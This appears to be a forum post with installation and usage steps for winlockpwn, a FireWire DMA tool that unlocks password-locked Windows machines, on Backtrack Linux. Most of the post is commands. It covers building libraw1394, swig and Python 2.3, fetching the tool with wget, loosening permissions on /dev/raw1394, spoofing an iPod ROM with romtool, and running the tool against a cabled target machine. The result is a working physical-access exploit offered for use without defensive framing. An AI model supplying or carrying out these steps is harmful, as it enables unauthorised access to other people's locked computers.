Adam Boileau (hxxp://wwx.storm.net.nz/projects/16) recently released source code for a tool winlockpwn that can unlock a password locked Windows machine in seconds.
Timothy Legge wrote some instructions on how to install this and get winlockpwn working on Ubuntu. I’ve used Timothy’s original document to document how to get the tool working on Backtrack 2 & Backtrack3 Beta.
Thanks
Jonah_15
Replace hxxp with http & wwx with www
Step 1
First we need to install the required libraries:
Libraw 1394 v1.3.0
hxxp://linux1394.org/dl/libraw1394-1.3.0.tar.gz
tar xvfz libraw1394-1.3.0.tar.gz
cd libraw1394-1.3.0
./configure
make
make dev
make install
Step 2
Install Swig
hxxp://downloads.sourceforge.net/swig-1.3.34.tar.gz
tar xvfz swig-1.3.34.tar.gz
cd swig-1.3.34
./configure
make
make install
Step 3
Install Python 2.3
hxxp://wwx.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvf Python-2.3.6.tar
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
make install
This will install python in /usr/local which means you need to update each script to reference this location.
Step 4
search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line
vi /usr/local/include/libraw1394/raw1394.h
Step 5
download the software from hxxp://wwx.storm.net.nz/projects/16
hxxp://wwx.storm.net.nz/static/files...394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make
Step 6
load the module and set some permissions:
modprobe raw1394
chmod 666 /dev/raw1394
Step 7
Copy libraw1394.so.8 to to /lib:
cd /usr/local/lib/
cp libraw1394.so.8 /lib
Step 8
Plug in the firewire cable into both your backtrack system and the target windows system.
Step 9
run businfo to check the port configurations:
vi businfo (update the location of python to be /usr/local/bin/python)
./businfo
Step 10
vi romtool (update the location of python to be /usr/local/bin/python)
cp libraw1394.so.8 /lib
./romtool -s 0 ipod.csr
Step 11
vi winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 3






thankyou for the 2.5 pointer 